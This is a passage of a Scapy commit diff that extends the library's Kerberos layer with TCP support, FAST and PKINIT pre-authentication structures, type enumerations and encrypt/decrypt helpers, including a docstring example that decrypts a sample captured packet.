Kerberos over TCP * Kerberos: add FAST & PKCA * Many user-friendly improvements * RFC3961 crypto * Summary, Sessions, Examples, Bugs * More tests, _n_fold edge case * Ignore potatoe (kerberos tests) from codespell --- .config/codespell_ignore.txt | 5 +- doc/scapy/usage.rst | 1 + scapy/layers/kerberos.py | 1121 +++++++++++++++++++++++++------- scapy/libs/rfc3961.py | 729 +++++++++++++++++++++ scapy/libs/structures.py | 2 +- test/scapy/layers/kerberos.uts | 128 +++- 6 files changed, 1753 insertions(+), 233 deletions(-) create mode 100644 scapy/libs/rfc3961.py diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index 2db67c3c2d1..11e65cb392f 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -1,3 +1,4 @@ +Ether aci ans archtypes @@ -8,6 +9,7 @@ cas cros doas doubleclick +ether eventtypes fo gost @@ -18,6 +20,7 @@ mitre nd negociate ot +potatoe referer ser te @@ -28,5 +31,3 @@ vas wan wanna webp -Ether -ether diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 08c402ce7eb..e4e3c5e1f15 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -788,6 +788,7 @@ Available by default: - :py:class:`~scapy.sessions.TCPSession` -> *defragment certain TCP protocols*. Currently supports: - HTTP 1.0 - TLS + - Kerberos / DCERPC - :py:class:`~scapy.sessions.TLSSession` -> *matches TLS sessions* on the flow. - :py:class:`~scapy.sessions.NetflowSession` -> *resolve Netflow V9 packets* from their NetflowFlowset information objects diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 8037ddb80cd..263ea354360 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -3,22 +3,52 @@ # Copyright (C) Gabriel Potter # This program is published under a GPLv2 license -""" +r""" Kerberos V5 -Implements parts of +Implements parts of: - Kerberos Network Authentication Service (V5): RFC4120 - Kerberos Version 5 GSS-API: RFC1964, RFC4121 +- Kerberos Pre-Authentication: RFC6113 (FAST) + +Example decryption: + +>>> from scapy.libs.rfc3961 import Key, EncryptionType +>>> pkt = Ether(hex_bytes("525400695813525400216c2b08004500015da71840008006dc\ +83c0a87a9cc0a87a11c209005854f6ab2392c25bd650182014b6e00000000001316a8201\ +2d30820129a103020105a20302010aa3633061304ca103020102a24504433041a0030201\ +12a23a043848484decb01c9b62a1cabfbc3f2d1ed85aa5e093ba8358a8cea34d4393af93\ +bf211e274fa58e814878db9f0d7a28d94e7327660db4f3704b3011a10402020080a20904\ +073005a0030101ffa481b73081b4a00703050040810010a1123010a003020101a1093007\ +1b0577696e3124a20e1b0c444f4d41494e2e4c4f43414ca321301fa003020102a1183016\ +1b066b72627467741b0c444f4d41494e2e4c4f43414ca511180f32303337303931333032\ +343830355aa611180f32303337303931333032343830355aa7060204701cc5d1a8153013\ +0201120201110201170201180202ff79020103a91d301b3019a003020114a11204105749\ +4e31202020202020202020202020")) +>>> enc = pkt[Kerberos].root.padata[0].padataValue +>>> k = Key(enc.etype.val, key=hex_bytes("7fada4e566ae4fb270e2800a23a\ +e87127a819d42e69b5e22de0ddc63da80096d")) +>>> enc.decrypt(k) """ -from scapy.asn1.asn1 import ASN1_SEQUENCE, ASN1_Class_UNIVERSAL, ASN1_Codecs +import struct + +import scapy.asn1.mib # noqa: F401 +from scapy.asn1.asn1 import ( + ASN1_SEQUENCE, + ASN1_STRING, + ASN1_Class_UNIVERSAL, + ASN1_Codecs, +) from scapy.asn1.ber import BERcodec_SEQUENCE from scapy.asn1fields import ( + ASN1F_BOOLEAN, ASN1F_CHOICE, ASN1F_FLAGS, ASN1F_GENERAL_STRING, ASN1F_GENERALIZED_TIME, ASN1F_INTEGER, + ASN1F_OID, ASN1F_PACKET, ASN1F_SEQUENCE, ASN1F_SEQUENCE_OF, @@ -31,6 +61,7 @@ ByteField, FlagsField, LEIntField, + LenField, LEShortEnumField, LEShortField, PadField, @@ -38,11 +69,10 @@ StrFixedLenEnumField, XStrFixedLenField, ) +from scapy.layers.inet import TCP, UDP from scapy.packet import Packet, bind_bottom_up, bind_layers from scapy.volatile import GeneralizedTime -from scapy.layers.inet import UDP - # kerberos APPLICATION @@ -62,6 +92,7 @@ class BERcodec_GSSAPI_APPLICATION(BERcodec_SEQUENCE): class ASN1F_KRB_APPLICATION(ASN1F_SEQUENCE): ASN1_tag = ASN1_Class_KRB.APPLICATION + # sect 5.2 @@ -74,13 +105,23 @@ class ASN1F_KRB_APPLICATION(ASN1F_SEQUENCE): class PrincipalName(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - Int32("nameType", 0, explicit_tag=0xa0), - ASN1F_SEQUENCE_OF( - "nameString", - [], - KerberosString, - explicit_tag=0xa1 - ) + ASN1F_enum_INTEGER( + "nameType", + 0, + { + 0: "NT-UNKNOWN", + 1: "NT-PRINCIPAL", + 2: "NT-SRV-INST", + 3: "NT-SRV-HST", + 4: "NT-SRV-XHST", + 5: "NT-UID", + 6: "NT-X500-PRINCIPAL", + 7: "NT-SMTP-NAME", + 10: "NT-ENTERPRISE", + }, + explicit_tag=0xA0, + ), + ASN1F_SEQUENCE_OF("nameString", [], KerberosString, explicit_tag=0xA1), ) @@ -91,86 +132,587 @@ class PrincipalName(ASN1_Packet): class HostAddress(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - Int32("addrType", 0, explicit_tag=0xa0), - ASN1F_STRING("address", "", explicit_tag=0xa1) + ASN1F_enum_INTEGER( + "addrType", + 0, + { + # RFC4120 sect 7.5.3 + 2: "IPv4", + 3: "Directional", + 5: "ChaosNet", + 6: "XNS", + 7: "ISO", + 12: "DECNET Phase IV", + 16: "AppleTalk DDP", + 20: "NetBios", + 24: "IPv6", + }, + explicit_tag=0xA0, + ), + ASN1F_STRING("address", "", explicit_tag=0xA1), ) HostAddresses = lambda name, **kwargs: ASN1F_SEQUENCE_OF( - name, - [], - HostAddress, - **kwargs + name, [], HostAddress, **kwargs ) class AuthorizationDataItem(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - Int32("adType", 0, explicit_tag=0xa0), - ASN1F_STRING("adData", "", explicit_tag=0xa1) + ASN1F_enum_INTEGER( + "adType", + 0, + { + # RFC4120 sect 7.5.4 + 1: "AD-IF-RELEVANT", + 2: "AD-INTENDED-FOR-SERVER", + 3: "AD-INTENDED-FOR-APPLICATION-CLASS", + 4: "AD-KDC-ISSUED", + 5: "AD-AND-OR", + 6: "AD-MANDATORY-TICKET-EXTENSIONS", + 7: "AD-IN-TICKET-EXTENSIONS", + 8: "AD-MANDATORY-FOR-KDC", + 64: "OSF-DCE", + 65: "SESAME", + 66: "AD-OSD-DCE-PKI-CERTID", + 128: "AD-WIN2K-PAC", + 129: "AD-ETYPE-NEGOTIATION", + }, + explicit_tag=0xA0, + ), + ASN1F_STRING("adData", "", explicit_tag=0xA1), ) AuthorizationData = lambda name, **kwargs: ASN1F_SEQUENCE_OF( - name, - [], - AuthorizationDataItem, - **kwargs + name, [], AuthorizationDataItem, **kwargs ) ADIFRELEVANT = AuthorizationData Checksum = lambda **kwargs: ASN1F_SEQUENCE( - Int32("chksumtype", 0, explicit_tag=0xa0), - ASN1F_STRING("checksum", "", explicit_tag=0xa1), + ASN1F_enum_INTEGER( + "checksumtype", + 0, + { + # RFC3961 sect 8 + 1: "CRC32", + 2: "RSA-MD4", + 3: "RSA-MD4-DES", + 4: "DES-MAC", + 5: "DES-MAC-K", + 6: "RSA-MD4-DES-K", + 7: "RSA-MD5", + 8: "RSA-MD5-DES", + 9: "RSA-MD5-DES3", + 10: "SHA1", + 12: "HMAC-SHA1-DES3-KD", + 13: "HMAC-SHA1-DES3", + 14: "SHA1", + 15: "HMAC-SHA1-96-AES128", + 16: "HMAC-SHA1-96-AES256", + }, + explicit_tag=0xA0, + ), + ASN1F_STRING("checksum", "", explicit_tag=0xA1), **kwargs ) ADKDCIssued = ASN1F_SEQUENCE( - Checksum(explicit_tag=0xa0), + Checksum(explicit_tag=0xA0), ASN1F_optional( - Realm("iRealm", "", explicit_tag=0xa1), + Realm("iRealm", "", explicit_tag=0xA1), ), - ASN1F_optional( - ASN1F_PACKET("iSname", None, PrincipalName, - explicit_tag=0xa2) - ), - AuthorizationData("elements", explicit_tag=0xa3) + ASN1F_optional(ASN1F_PACKET("iSname", None, PrincipalName, explicit_tag=0xA2)), + AuthorizationData("elements", explicit_tag=0xA3), ) ASANDOR = ASN1F_SEQUENCE( - Int32("conditionCount", 0, explicit_tag=0xa1), - AuthorizationData("elements", explicit_tag=0xa1) + Int32("conditionCount", 0, explicit_tag=0xA1), + AuthorizationData("elements", explicit_tag=0xA1), ) ADMANDATORYFORKDC = AuthorizationData -class PADATA(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( - Int32("padataType", 0, explicit_tag=0xa1), - ASN1F_STRING("padataValue", "", explicit_tag=0xa2) - ) +_KRB_E_TYPES = { + 0x1: "DES", + 0x10: "3DES", + 0x11: "AES-128", + 0x12: "AES-256", + 0x17: "RC4", +} class EncryptedData(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - Int32("etype", 0, explicit_tag=0xa0), - ASN1F_optional( - UInt32("kvno", 0, explicit_tag=0xa1) - ), - ASN1F_STRING("cipher", "", explicit_tag=0xa2) + ASN1F_enum_INTEGER("etype", 0x1, _KRB_E_TYPES, explicit_tag=0xA0), + ASN1F_optional(UInt32("kvno", 0, explicit_tag=0xA1)), + ASN1F_STRING("cipher", "", explicit_tag=0xA2), ) + def get_usage(self): + """ + Get current key usage number and encrypted class + """ + # RFC 4120 sect 7.5.1 + if self.underlayer: + if isinstance(self.underlayer, PADATA): + patype = self.underlayer.padataType + if patype == 2: # PA-ENC-TIMESTAMP + return 1, PA_ENC_TS_ENC + print(patype) + raise ValueError( + "Could not guess key usage number. Please specify key_usage_number" + ) + + def decrypt(self, key, key_usage_number=None, cls=None): + """ + Decrypt and return the data contained in cipher. + + :param key: the key to use for decryption + :param key_usage_number: (optional) specify the key usage number. + Guessed otherwise + :param cls: (optional) the class of the decrypted payload + Guessed otherwise (or bytes) + """ + if key_usage_number is None: + key_usage_number, cls = self.get_usage() + d = key.decrypt(key_usage_number, self.cipher.val) + if cls: + return cls(d) + return d + + def encrypt(self, key, text, confounder=None, key_usage_number=None): + """ + Encrypt text and set it into cipher. + + :param key: the key to use for encryption + :param text: the bytes value to encode + :param confounder: (optional) specify the confounder bytes. Random otherwise + :param key_usage_number: (optional) specify the key usage number. + Guessed otherwise + """ + if key_usage_number is None: + key_usage_number = self.get_usage()[0] + self.cipher = key.encrypt(key_usage_number, text, confounder=confounder) + EncryptionKey = lambda **kwargs: ASN1F_SEQUENCE( Int32("keytype", 0, explicit_tag=0x0), ASN1F_STRING("keyvalue", "", explicit_tag=0x1), **kwargs ) -PAENCTIMESTAMP = EncryptedData KerberosFlags = ASN1F_FLAGS -# sect 5.10 +_PADATA_TYPES = { + 1: "PA-TGS-REQ", + 2: "PA-ENC-TIMESTAMP", + 3: "PA-PW-SALT", + 11: "PA-ETYPE-INFO", + 14: "PA-PK-AS-REQ-OLD", + 15: "PA-PK-AS-REP-OLD", + 16: "PA-PK-AS-REQ", + 17: "PA-PK-AS-REP", + 19: "PA-ETYPE-INFO2", + 20: "PA-SVR-REFERRAL-INFO", + 128: "PA-PAC-REQUEST", + 133: "PA-FX-COOKIE", + 134: "PA-AUTHENTICATION-SET", + 135: "PA-AUTH-SET-SELECTED", + 136: "PA-FX-FAST", + 137: "PA-FX-ERROR", + 165: "PA-SUPPORTED-ENCTYPES", + 167: "PA-PAC-OPTIONS", +} + +_PADATA_CLASSES = { + # Filled elsewhere in this file +} + + +# RFC4120 + + +class _PADATA_value_Field(ASN1F_STRING): + """ + A special field that properly dispatches PA-DATA values according to + padata-type and if the paquet is a request or a response. + """ + + holds_packets = 1 + + def m2i(self, pkt, s): + val = super(_PADATA_value_Field, self).m2i(pkt, s) + if pkt.padataType.val in _PADATA_CLASSES: + cls = _PADATA_CLASSES[pkt.padataType.val] + if isinstance(cls, tuple): + is_reply = ( + pkt.underlayer.underlayer is not None and + isinstance(pkt.underlayer.underlayer, KRB_ERROR) + ) or isinstance(pkt.underlayer, (KRB_AS_REP, KRB_TGS_REP)) + cls = cls[is_reply] + if not val[0].val: + return val + return cls(val[0].val, _underlayer=pkt), b"" + return val + + def i2m(self, pkt, val): + if isinstance(val, ASN1_Packet): + val = ASN1_STRING(bytes(val)) + return super(_PADATA_value_Field, self).i2m(pkt, val) + + +class PADATA(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_enum_INTEGER("padataType", 0, _PADATA_TYPES, explicit_tag=0xA1), + _PADATA_value_Field( + "padataValue", + "", + explicit_tag=0xA2, + ), + ) + + +# RFC 4120 sect 5.2.7.2 + + +class PA_ENC_TS_ENC(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + KerberosTime("patimestamp", GeneralizedTime(), explicit_tag=0xA0), + ASN1F_optional(Microseconds("pausec", 0, explicit_tag=0xA1)), + ) + + +_PADATA_CLASSES[2] = EncryptedData + + +# RFC 4120 sect 5.2.7.4 + + +class ETYPE_INFO_ENTRY(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_enum_INTEGER("etype", 0x1, _KRB_E_TYPES, explicit_tag=0xA0), + ASN1F_optional( + ASN1F_STRING("salt", "", explicit_tag=0xA1), + ), + ) + + +class ETYPE_INFO(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE_OF("seq", [ETYPE_INFO_ENTRY()], ETYPE_INFO_ENTRY) + + +_PADATA_CLASSES[11] = ETYPE_INFO + +# RFC 4120 sect 5.2.7.5 + + +class ETYPE_INFO_ENTRY2(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_enum_INTEGER("etype", 0x1, _KRB_E_TYPES, explicit_tag=0xA0), + ASN1F_optional( + KerberosString("salt", "", explicit_tag=0xA1), + ), + ASN1F_optional( + ASN1F_STRING("s2kparams", "", explicit_tag=0xA2), + ), + ) + + +class ETYPE_INFO2(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE_OF("seq", [ETYPE_INFO_ENTRY2()], ETYPE_INFO_ENTRY2) + + +_PADATA_CLASSES[19] = ETYPE_INFO2 + +# PADATA Extended with RFC6113 + + +class PA_AUTHENTICATION_SET_ELEM(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + Int32("paType", 0, explicit_tag=0xA0), + ASN1F_optional( + ASN1F_STRING("paHint", "", explicit_tag=0xA1), + ), + ASN1F_optional( + ASN1F_STRING("paValue", "", explicit_tag=0xA2), + ), + ) + + +class PA_AUTHENTICATION_SET(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE_OF( + "elems", [PA_AUTHENTICATION_SET_ELEM()], PA_AUTHENTICATION_SET_ELEM + ) + + +_PADATA_CLASSES[134] = PA_AUTHENTICATION_SET + +# [MS-KILE] sect 2.2.3 + + +class PA_PAC_REQUEST(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_BOOLEAN("includePac", True, explicit_tag=0xA0), + ) + + +_PADATA_CLASSES[128] = PA_PAC_REQUEST + + +# [MS-KILE] sect 2.2.8 + + +class PA_SUPPORTED_ENCTYPES(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = KerberosFlags( + "flags", + 0, + [ + "DES-CBC-CRC", + "DES-CBC-MD5", + "RC4-HMAC", + "AES128-CTS-HMAC-SHA1-96", + "AES256-CTS-HMAC-SHA1-96", + ] + + ["bit_%d" % i for i in range(11)] + + [ + "FAST-supported", + "Compount-identity-supported", + "Claims-supported", + "Resource-SID-compression-disabled", + ], + ) + + +_PADATA_CLASSES[165] = PA_SUPPORTED_ENCTYPES + +# [MS-KILE] sect 2.2.10 + + +class PA_PAC_OPTIONS(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + KerberosFlags( + "options", + 0, + [ + "Claims", + "Branch-Aware", + "Forward-to-Full-DC", + ], + ) + ) + + +_PADATA_CLASSES[167] = PA_PAC_OPTIONS + + +# RFC6113 sect 5.4.1 + + +class _KrbFastArmor_value_Field(ASN1F_STRING): + holds_packets = 1 + + def m2i(self, pkt, s): + val = super(_KrbFastArmor_value_Field, self).m2i(pkt, s) + if not val[0].val: + return val + if pkt.armorType.val == 1: # FX_FAST_ARMOR_AP_REQUEST + return KRB_AP_REQ(val[0].val, _underlayer=pkt), b"" + return val + + def i2m(self, pkt, val): + if isinstance(val, ASN1_Packet): + val = ASN1_STRING(bytes(val)) + return super(_KrbFastArmor_value_Field, self).i2m(pkt, val) + + +class KrbFastArmor(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_enum_INTEGER( + "armorType", 1, {1: "FX_FAST_ARMOR_AP_REQUEST"}, explicit_tag=0xA0 + ), + _KrbFastArmor_value_Field("armorValue", "", explicit_tag=0xA1), + ) + + +# RFC6113 sect 5.4.2 + + +class KrbFastArmoredReq(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_SEQUENCE( + ASN1F_optional( + ASN1F_PACKET("armor", KrbFastArmor(), KrbFastArmor, explicit_tag=0xA0) + ), + Checksum(explicit_tag=0xA1), + ASN1F_PACKET("encFastReq", None, EncryptedData, explicit_tag=0xA2), + ) + ) + + +class PA_FX_FAST_REQUEST(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_CHOICE( + "armoredData", + ASN1_STRING(""), + ASN1F_PACKET("req", KrbFastArmoredReq, KrbFastArmoredReq, implicit_tag=0xA0), + ) + + +class KrbFastReq(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + KerberosFlags( + "fastOptions", + "", + [ + "RESERVED", + "hide-client-names", + ] + + ["res%d" % i for i in range(2, 16)] + + ["kdc-follow-referrals"], + explicit_tag=0xA0, + ), + ASN1F_SEQUENCE_OF("padata", [PADATA()], PADATA, explicit_tag=0xA1), + ASN1F_PACKET("reqBody", None, EncryptedData, explicit_tag=0xA2), + ) + + +# RFC6113 sect 5.4.3 + + +class KrbFastArmoredRep(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_SEQUENCE( + ASN1F_PACKET("encFastRep", None, EncryptedData, explicit_tag=0xA0), + ) + ) + + +class PA_FX_FAST_REPLY(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_CHOICE( + "armoredData", + ASN1_STRING(""), + ASN1F_PACKET("req", KrbFastArmoredRep, KrbFastArmoredRep, implicit_tag=0xA0), + ) + + +class KrbFastFinished(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + Microseconds("timestamp", 0, explicit_tag=0xA0), + KerberosTime("usec", GeneralizedTime(), explicit_tag=0xA1), + Realm("crealm", "", explicit_tag=0xA2), + ASN1F_PACKET("cname", None, PrincipalName, explicit_tag=0xA3), + Checksum(explicit_tag=0xA4), + ) + + +class KrbFastResponse(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_SEQUENCE_OF("padata", [PADATA()], PADATA, explicit_tag=0xA0), + ASN1F_optional(EncryptionKey(explicit_tag=0xA1)), + ASN1F_optional( + ASN1F_PACKET( + "finished", KrbFastFinished(), KrbFastFinished, explicit_tag=0xA2 + ) + ), + UInt32("nonce", 0, explicit_tag=0xA3), + ) + + +_PADATA_CLASSES[136] = (PA_FX_FAST_REQUEST, PA_FX_FAST_REPLY) + +# RFC 4556 + + +# sect 3.2.1 + + +class ExternalPrincipalIdentifier(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_optional( + ASN1F_STRING("subjectName", "", implicit_tag=0xA0), + ), + ASN1F_optional( + ASN1F_STRING("issuerAndSerialNumber", "", implicit_tag=0xA1), + ), + ASN1F_optional( + ASN1F_STRING("subjectKeyIdentifier", "", implicit_tag=0xA2), + ), + ) + + +class PA_PK_AS_REQ(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_STRING("signedAuthpack", "", implicit_tag=0xA0), + ASN1F_optional( + ASN1F_SEQUENCE_OF( + "trustedCertifiers", + [ExternalPrincipalIdentifier()], + ExternalPrincipalIdentifier, + explicit_tag=0xA1, + ), + ), + ASN1F_optional( + ASN1F_STRING("kdcPkId", "", implicit_tag=0xA2), + ), + ) + + +_PADATA_CLASSES[16] = PA_PK_AS_REQ + +# sect 3.2.3 + + +class DHRepInfo(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_STRING("dhSignedData", "", implicit_tag=0xA0), + ASN1F_optional( + ASN1F_STRING("serverDHNonce", "", explicit_tag=0xA1), + ), + ) + + +class EncKeyPack(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_STRING("encKeyPack", "") + + +class PA_PK_AS_REP(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_CHOICE( + "rep", + ASN1_STRING(""), + ASN1F_PACKET("dhInfo", DHRepInfo(), DHRepInfo, explicit_tag=0xA0), + ASN1F_PACKET("encKeyPack", EncKeyPack(), EncKeyPack, explicit_tag=0xA1), + ) + + +_PADATA_CLASSES[17] = PA_PK_AS_REP + +# Back to RFC4120 + +# sect 5.10 KRB_MSG_TYPES = { 1: "Ticket", 2: "Authenticator", @@ -198,102 +740,83 @@ class KRB_Ticket(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_KRB_APPLICATION( ASN1F_SEQUENCE( - ASN1F_INTEGER("tktVno", 0, explicit_tag=0xa0), - Realm("realm", "", explicit_tag=0xa1), - ASN1F_PACKET("sname", None, PrincipalName, - explicit_tag=0xa2), - ASN1F_PACKET("encPart", None, EncryptedData, - explicit_tag=0xa3), + ASN1F_INTEGER("tktVno", 0, explicit_tag=0xA0), + Realm("realm", "", explicit_tag=0xA1), + ASN1F_PACKET("sname", None, PrincipalName, explicit_tag=0xA2), + ASN1F_PACKET("encPart", None, EncryptedData, explicit_tag=0xA3), ), - implicit_tag=1 + implicit_tag=1, ) + # sect 5.4.1 class KRB_KDC_REQ_BODY(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - KerberosFlags("kdcOptions", "", [ - "reserved", - "forwardable", - "forwarded", - "proxiable", - "proxy", - "allow-postdate", - "postdated", - "unused7", - "renewable", - "unused9", - "unused10", - "opt-hardware-auth", - "unused12", - "unused13", - "constrained-delegation", - "canonicalize", - "request-anonymous", - ] + ["unused%d" % i for i in range(17, 26)] + [ - "disable-transited-check", - "renewable-ok", - "enc-tkt-in-skey", - "unused29", - "renew", - "validate" - ], - explicit_tag=0xa0), - ASN1F_optional( - ASN1F_PACKET("cname", None, PrincipalName, - explicit_tag=0xa1) + KerberosFlags( + "kdcOptions", + "", + [ + "reserved", + "forwardable", + "forwarded", + "proxiable", + "proxy", + "allow-postdate", + "postdated", + "unused7", + "renewable", + "unused9", + "unused10", + "opt-hardware-auth", + "unused12", + "unused13", + "constrained-delegation", + "canonicalize", + "request-anonymous", + ] + + ["unused%d" % i for i in range(17, 26)] + + [ + "disable-transited-check", + "renewable-ok", + "enc-tkt-in-skey", + "unused29", + "renew", + "validate", + ], + explicit_tag=0xA0, ), - Realm("realm", "", explicit_tag=0xa2), + ASN1F_optional(ASN1F_PACKET("cname", None, PrincipalName, explicit_tag=0xA1)), + Realm("realm", "", explicit_tag=0xA2), ASN1F_optional( - ASN1F_PACKET("sname", None, PrincipalName, - explicit_tag=0xa3), + ASN1F_PACKET("sname", None, PrincipalName, explicit_tag=0xA3), ), + ASN1F_optional(KerberosTime("from", None, explicit_tag=0xA4)), + KerberosTime("till", GeneralizedTime(), explicit_tag=0xA5), + ASN1F_optional(KerberosTime("rtime", GeneralizedTime(), explicit_tag=0xA6)), + UInt32("nonce", 0, explicit_tag=0xA7), + ASN1F_SEQUENCE_OF("etype", [], Int32, explicit_tag=0xA8), ASN1F_optional( - KerberosTime("from", GeneralizedTime(), explicit_tag=0xa4) + HostAddresses("addresses", explicit_tag=0xA9), ), - KerberosTime("till", GeneralizedTime(), explicit_tag=0xa5), ASN1F_optional( - KerberosTime("rtime", GeneralizedTime(), explicit_tag=0xa6) - ), - UInt32("nonce", 0, explicit_tag=0xa7), - ASN1F_SEQUENCE_OF( - "etype", - [], - Int32, - explicit_tag=0xa8 - ), - ASN1F_optional( - HostAddresses("addresses", explicit_tag=0xa9), + ASN1F_PACKET( + "encAuthorizationData", None, EncryptedData, explicit_tag=0xAA + ), ), ASN1F_optional( - ASN1F_PACKET("encAuthorizationData", None, EncryptedData, - explicit_tag=0xaa), + ASN1F_SEQUENCE_OF("additionalTickets", [], KRB_Ticket, explicit_tag=0xAB) ), - ASN1F_optional( - ASN1F_SEQUENCE_OF( - "additionalTickets", - [], - KRB_Ticket, - explicit_tag=0xab - ) - ) ) KRB_KDC_REQ = ASN1F_SEQUENCE( - ASN1F_INTEGER("pvno", 5, explicit_tag=0xa1), - ASN1F_enum_INTEGER("msgType", 10, KRB_MSG_TYPES, - explicit_tag=0xa2), - ASN1F_optional( - ASN1F_SEQUENCE_OF("padata", [], PADATA, - explicit_tag=0xa3) - ), - ASN1F_PACKET("reqBody", - KRB_KDC_REQ_BODY(), - KRB_KDC_REQ_BODY, - explicit_tag=0xa4) + ASN1F_INTEGER("pvno", 5, explicit_tag=0xA1), + ASN1F_enum_INTEGER("msgType", 10, KRB_MSG_TYPES, explicit_tag=0xA2), + ASN1F_optional(ASN1F_SEQUENCE_OF("padata", [], PADATA, explicit_tag=0xA3)), + ASN1F_PACKET("reqBody", KRB_KDC_REQ_BODY(), KRB_KDC_REQ_BODY, explicit_tag=0xA4), ) @@ -316,20 +839,15 @@ class KRB_TGS_REQ(ASN1_Packet): # sect 5.4.2 KRB_KDC_REP = ASN1F_SEQUENCE( - ASN1F_INTEGER("pvno", 5, explicit_tag=0xa0), - ASN1F_enum_INTEGER("msgType", 11, KRB_MSG_TYPES, - explicit_tag=0xa1), + ASN1F_INTEGER("pvno", 5, explicit_tag=0xA0), + ASN1F_enum_INTEGER("msgType", 11, KRB_MSG_TYPES, explicit_tag=0xA1), ASN1F_optional( - ASN1F_SEQUENCE_OF("padata", [], PADATA, - explicit_tag=0xa2), + ASN1F_SEQUENCE_OF("padata", [], PADATA, explicit_tag=0xA2), ), - Realm("crealm", "", explicit_tag=0xa3), - ASN1F_PACKET("cname", None, PrincipalName, - explicit_tag=0xa4), - ASN1F_PACKET("ticket", None, KRB_Ticket, - explicit_tag=0xa5), - ASN1F_PACKET("encPart", None, EncryptedData, - explicit_tag=0xa6), + Realm("crealm", "", explicit_tag=0xA3), + ASN1F_PACKET("cname", None, PrincipalName, explicit_tag=0xA4), + ASN1F_PACKET("ticket", None, KRB_Ticket, explicit_tag=0xA5), + ASN1F_PACKET("encPart", None, EncryptedData, explicit_tag=0xA6), ) @@ -351,49 +869,50 @@ class KRB_TGS_REP(ASN1_Packet): # sect 5.5.1 + class KRB_AP_REQ(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_KRB_APPLICATION( ASN1F_SEQUENCE( - ASN1F_INTEGER("pvno", 5, explicit_tag=0xa0), - ASN1F_enum_INTEGER("msgType", 14, KRB_MSG_TYPES, - explicit_tag=0xa1), - KerberosFlags("apOptions", "", [ - "reserved", - "use-session-key", - "mutual-required", - ], explicit_tag=0xa2), - ASN1F_PACKET("ticket", None, KRB_Ticket, - explicit_tag=0xa3), - ASN1F_PACKET("authenticator", None, EncryptedData, - explicit_tag=0xa4), + ASN1F_INTEGER("pvno", 5, explicit_tag=0xA0), + ASN1F_enum_INTEGER("msgType", 14, KRB_MSG_TYPES, explicit_tag=0xA1), + KerberosFlags( + "apOptions", + "", + [ + "reserved", + "use-session-key", + "mutual-required", + ], + explicit_tag=0xA2, + ), + ASN1F_PACKET("ticket", None, KRB_Ticket, explicit_tag=0xA3), + ASN1F_PACKET("authenticator", None, EncryptedData, explicit_tag=0xA4), ), implicit_tag=14, ) +_PADATA_CLASSES[1] = KRB_AP_REQ + + class KRB_Authenticator(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_KRB_APPLICATION( ASN1F_SEQUENCE( - ASN1F_INTEGER("authenticatorPvno", 5, explicit_tag=0xa0), - Realm("crealm", "", explicit_tag=0xa1), - ASN1F_PACKET("cname", None, PrincipalName, - explicit_tag=0xa2), - ASN1F_optional( - Checksum(explicit_tag=0x3) - ), - Microseconds("cusec", 0, explicit_tag=0xa4), - KerberosTime("ctime", 0, explicit_tag=0xa5), + ASN1F_INTEGER("authenticatorPvno", 5, explicit_tag=0xA0), + Realm("crealm", "", 